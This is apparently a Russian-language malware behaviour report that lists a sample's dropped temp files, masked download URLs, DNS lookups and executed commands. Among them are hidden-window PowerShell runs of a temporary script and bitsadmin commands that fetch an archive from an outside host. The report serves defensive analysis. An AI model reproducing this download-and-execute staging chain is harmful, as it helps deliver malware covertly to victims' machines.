Техническая информация
- %TEMP%\nsaab27.tmp\modern-header.bmp
- %TEMP%\nsaab27.tmp\system.dll
- %TEMP%\nsaab27.tmp\tempfile.ps1
- %TEMP%\nsaab27.tmp\nsexec.dll
- %TEMP%\nsaab27.tmp\dialer.dll
- C:\bitf389.tmp
- %TEMP%\nsaab27.tmp\inetc.dll
- C:\bitf389.tmp
- C:\zip.7z
- C:\bitf389.tmp в C:\zip.7z (по-видимому, перемещение/переименование файла C:\bitf389.tmp в C:\zip.7z)
- http://yo###estsw.com/sw/dls.7z
- http://fa###ence.com/campaign/?ty#################################################
- DNS ASK yo###estsw.com
- DNS ASK fa###ence.com
- ClassName: '#32770' WindowName: ''
- ClassName: 'SysListView32' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1" (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /Transfer helper http://yo###estsw.com/sw/dls.7z C:\zip.7z (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -inputformat none -ExecutionPolicy RemoteSigned -File "%TEMP%\nsaAB27.tmp\tempfile.ps1" (со скрытым окном)
- '%WINDIR%\syswow64\bitsadmin.exe' /Transfer helper http://yo###estsw.com/sw/dls.7z C:\zip.7z